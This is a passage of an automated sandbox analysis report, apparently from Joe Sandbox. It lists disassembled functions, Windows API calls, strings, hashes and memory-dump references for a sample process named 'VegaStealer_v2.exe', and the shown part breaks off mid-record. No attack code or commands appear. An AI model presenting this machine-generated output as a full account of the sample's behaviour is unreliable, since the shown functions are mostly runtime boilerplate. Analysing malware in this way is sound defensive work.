Instruction Fuzzy Hash: 1691CBA2F19A4A86FA308B21D6116B973E0FF49BA8F9442B5CD1D873D8DE3CE541C700

Function 00007FF69AF1B5A0 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF69AF1B5FA
MultiByteToWideChar.KERNEL32 ref: 00007FF69AF1B63A

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 393e6c5c3a1e5845fd4fc5ee744cc085087517d35f56047cd9ca296ef67b1d22
Instruction ID: f717ad62e6a915763771c6a2cb6c8050648672b2b69c37b673cb58791add5993
Opcode Fuzzy Hash: 393e6c5c3a1e5845fd4fc5ee744cc085087517d35f56047cd9ca296ef67b1d22
Instruction Fuzzy Hash: FC3191B2A0C281CAE7709B25A4043B936D0FBA4794F9481F5EA98C77D5CF3CD985DB00

Function 00007FF69AF14000 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF69AF14030
wcscpy.MSVCRT ref: 00007FF69AF1403B
wcslen.MSVCRT ref: 00007FF69AF1404D

Strings

0, xrefs: 00007FF69AF1407E

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memsetwcscpywcslen
String ID: 0
API String ID: 3616488086-4108050209
Opcode ID: a2113daaead7763a2add9b9668c5bc286bd5f75af77c405c9a54322c48e30157
Instruction ID: 813c3d802999ccf44f1fc61e67c690d103963d25193a84b3616ec40950fe3281
Opcode Fuzzy Hash: a2113daaead7763a2add9b9668c5bc286bd5f75af77c405c9a54322c48e30157
Instruction Fuzzy Hash: 5E110162A2869082E760D721E4043ABB6A0EFC47A4F900371FA9D87BD5DF3EC1468B40

Function 00007FF69AF16730 Relevance: 6.0, APIs: 4, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 00007FF69AF1674B
TlsAlloc.KERNEL32 ref: 00007FF69AF16758
GetLastError.KERNEL32 ref: 00007FF69AF16780
abort.MSVCRT ref: 00007FF69AF16788

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphoreabort
String ID:
API String ID: 4146797221-0
Opcode ID: 7ed4582e6cfc2eedc68ffde5b04e3b3758d5de061164d9ed7da4b154b13cc271
Instruction ID: 2724bf282d77f654814c5d3600fbe568a8ed6e78442f773efb0a99e3455e247f
Opcode Fuzzy Hash: 7ed4582e6cfc2eedc68ffde5b04e3b3758d5de061164d9ed7da4b154b13cc271
Instruction Fuzzy Hash: 32F01CB0E09A0786F774AB356B4943537E2EF49390F9002F5C81DC32F1EF2CA6459200

Function 00007FF69AF11560 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF69AF14000: memset.MSVCRT ref: 00007FF69AF14030
Part of subcall function 00007FF69AF14000: wcscpy.MSVCRT ref: 00007FF69AF1403B
Part of subcall function 00007FF69AF14000: wcslen.MSVCRT ref: 00007FF69AF1404D

memset.MSVCRT ref: 00007FF69AF115A8
_wgetenv.MSVCRT ref: 00007FF69AF116E4

Strings

99C, xrefs: 00007FF69AF11656

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memset$_wgetenvwcscpywcslen
String ID: 99C
API String ID: 753804109-3786687225
Opcode ID: 630722e66aa89e864fabcbf00fddbdaab551133ad1f23f75926378ecb3cf0540
Instruction ID: b998078d0f86eef237674400b08f14a37305528e2e6623836d4424da8d24a980
Opcode Fuzzy Hash: 630722e66aa89e864fabcbf00fddbdaab551133ad1f23f75926378ecb3cf0540
Instruction Fuzzy Hash: E841D2A2A08B8685FB71CB26E44477A77E0EB59B94F4480B5EE8D87795EF3DD140C700

Function 00007FF69AF15310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

Unknown error, xrefs: 00007FF69AF15400
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: 79dd460563d5a1093e8d951f514f1225439d89af9e0f4d298c37f5dcd8f35023
Instruction ID: 14c286f42cf67e0d577d5796ba56314b5e9812a99700421c15f39cdf4d38566f
Opcode Fuzzy Hash: 79dd460563d5a1093e8d951f514f1225439d89af9e0f4d298c37f5dcd8f35023
Instruction Fuzzy Hash: 4001C262908E88C5D6268F1CE8051FAB3B4FF5E75AF645361EA8C67220DF29D643C700

Function 00007FF69AF153B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379
Overflow range error (OVERFLOW), xrefs: 00007FF69AF153B0

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 5dcdf501f8d0c0d78b672e358af8105a88eb9d6e5a5ed3cda2d80ae3d40122af
Instruction ID: ff841cd52980efae7fa9837a434b7de25b6110bf51b0a6cbca9925e4eebd9ecf
Opcode Fuzzy Hash: 5dcdf501f8d0c0d78b672e358af8105a88eb9d6e5a5ed3cda2d80ae3d40122af
Instruction Fuzzy Hash: 48F06252818F4885D6128F1CA4001FBB370FF5D799F685365EB8D67164DF28D643C700

Function 00007FF69AF153C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

The result is too small to be represented (UNDERFLOW), xrefs: 00007FF69AF153C0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 57eeb79cd4f0b2dc4027a266efb26da0f7fc4c20b6a9d173aa8d348e7b14c023
Instruction ID: c7b1fc50e5dd0217cdd5a96cbc80487795d5e664ba2bec8fa0a4218e856737ed
Opcode Fuzzy Hash: 57eeb79cd4f0b2dc4027a266efb26da0f7fc4c20b6a9d173aa8d348e7b14c023
Instruction Fuzzy Hash: ACF06252818F4885D2228F1CA4001FBB375FF5D799F585365EB8D67164DF28D643C700

Function 00007FF69AF153D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379
Total loss of significance (TLOSS), xrefs: 00007FF69AF153D0

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 38568af7201735c52b79fa0f35c1dd809b822f0fa833d1a51486900347d5e6b6
Instruction ID: 592ec97580908fd632a23eb99210c2f7ef93031bf776636f200e66acb77b61c6
Opcode Fuzzy Hash: 38568af7201735c52b79fa0f35c1dd809b822f0fa833d1a51486900347d5e6b6
Instruction Fuzzy Hash: 5AF06252818F4885D2128F1CA8001FBB370FF5D799F585365EB8D67624DF28D6438700

Function 00007FF69AF153E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379
Partial loss of significance (PLOSS), xrefs: 00007FF69AF153E0

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 95928504ff078c1d2e3c42a3fc65cd6db849bff2dbc220db9ec59e168a567e8e
Instruction ID: aaa41c8f2a94dd23ec7c2ec204f942c41fab8a60aef975d1c29238742940ca35
Opcode Fuzzy Hash: 95928504ff078c1d2e3c42a3fc65cd6db849bff2dbc220db9ec59e168a567e8e
Instruction Fuzzy Hash: 12F06252818F4885D2128F1CA4001FBB370FF5D799F585365EB8D67164DF28D643C700

Function 00007FF69AF153F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

Argument singularity (SIGN), xrefs: 00007FF69AF153F0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 9b74fbfd760e2f08af4cc342425735ee6629a5717db67921eeb2ad025599fb8b
Instruction ID: f18518cb6542d38f5a1e38d7c2b53dc4cd78f987c109ec459e891c827e02ad7e
Opcode Fuzzy Hash: 9b74fbfd760e2f08af4cc342425735ee6629a5717db67921eeb2ad025599fb8b
Instruction Fuzzy Hash: F7F06252818F4885D2218F1CA4041FBB370FF5D799F585366EB8D67124DF28D6438700

Function 00007FF69AF15341 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF69AF15389

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF69AF15379
Argument domain error (DOMAIN), xrefs: 00007FF69AF15341

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 3115e7dada9010ebd3e19ac1b71b669bba03f88afe863013d6b0a881a04c3dc2
Instruction ID: 21adfda44a8698ff04aa6b0bf17de04431ffb41e47ccfda875e13f678f56f80e
Opcode Fuzzy Hash: 3115e7dada9010ebd3e19ac1b71b669bba03f88afe863013d6b0a881a04c3dc2
Instruction Fuzzy Hash: 45F06D56818F8886D2128F18A8001BBB360FF4E799F585366EF8C2A224DF28D6438700

Function 00007FF69AF14160 Relevance: 5.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF69AF14188
wcscpy.MSVCRT ref: 00007FF69AF14217
wcscat.MSVCRT ref: 00007FF69AF14222
wcslen.MSVCRT ref: 00007FF69AF14233

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memsetwcscatwcscpywcslen
String ID:
API String ID: 468205783-0
Opcode ID: 0dc682289dbf7da38c2663837fbf556bca0a988e4e02d6b3a43a619d61269f36
Instruction ID: bf90d923dd5d10e1c21a71d793cb47a9852e03e3a0c5a1be6076a97a73efd226
Opcode Fuzzy Hash: 0dc682289dbf7da38c2663837fbf556bca0a988e4e02d6b3a43a619d61269f36
Instruction Fuzzy Hash: 9D21A262A18B8585E771DF26E85837A76E0FB59B84F4881B5EE8C87791EF7CD080C300

Function 00007FF69AF15D40 Relevance: 5.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF69AF15D67
free.MSVCRT ref: 00007FF69AF15DB8
LeaveCriticalSection.KERNEL32 ref: 00007FF69AF15DC4

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: 0e0decab636d231f7f1742a7203d3f4cc7ae845923e50379d15f1c7c98d0e1c4
Instruction ID: 3ad3c2cf37912c09a6e6f66d959acd2c8b5b86f071f5d6fdaa12f2c3d279d563
Opcode Fuzzy Hash: 0e0decab636d231f7f1742a7203d3f4cc7ae845923e50379d15f1c7c98d0e1c4
Instruction Fuzzy Hash: DD1117A1F1D60B86EA78CB55EA9417933E1EF98B80B9458F4C50DC7370DF2CEA459300

Analysis Process: VegaStealer_v2.exePID: 3252, Parent PID: 6192COMMON

Execution Graph

Execution Coverage:	83.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	40%
Total number of Nodes:	5
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401AE1 Relevance: 6.0, APIs: 4, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 00401AE1
GetModuleHandleA.KERNEL32(00000000), ref: 00401AED
GetProcessHeap.KERNEL32(00000000), ref: 00401AF7

Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED

ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B18

Memory Dump Source

Source File: 00000005.00000002.2044084092.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2043999955.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044107105.0000000000402000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044139172.0000000000403000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044139172.0000000000408000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2044216641.0000000000411000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2045917495.0000000000BC0000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_VegaStealer_v2.jbxd

Similarity

API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
String ID:
API String ID: 673778540-0
Opcode ID: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
Instruction ID: 8601b60a343ef63eca695c0712cadf30932154ab05066af7af19716e0146d46f
Opcode Fuzzy Hash: bf6d8b6f60bdcb853f7381a7d85681237ca7f04d2f73d170e19a7b203482a8eb
Instruction Fuzzy Hash: 72E06774959300AAE7217F71AE06B143E74E70474BF10407BF6157A1F6EB786A10AB1D

Function 00401000 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 67
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadIconA.USER32(00403000,000001F4), ref: 0040104C
LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
RegisterClassExA.USER32(00000030), ref: 0040106E
CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
ShowWindow.USER32(00000001,?), ref: 004010BC
UpdateWindow.USER32(00000001), ref: 004010C7
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
TranslateMessage.USER32(?), ref: 004010E4
DispatchMessageA.USER32(?), ref: 004010ED

Strings

WinClass32, xrefs: 0040103D, 0040109E, 004010A3
0, xrefs: 00401006

Memory Dump Source

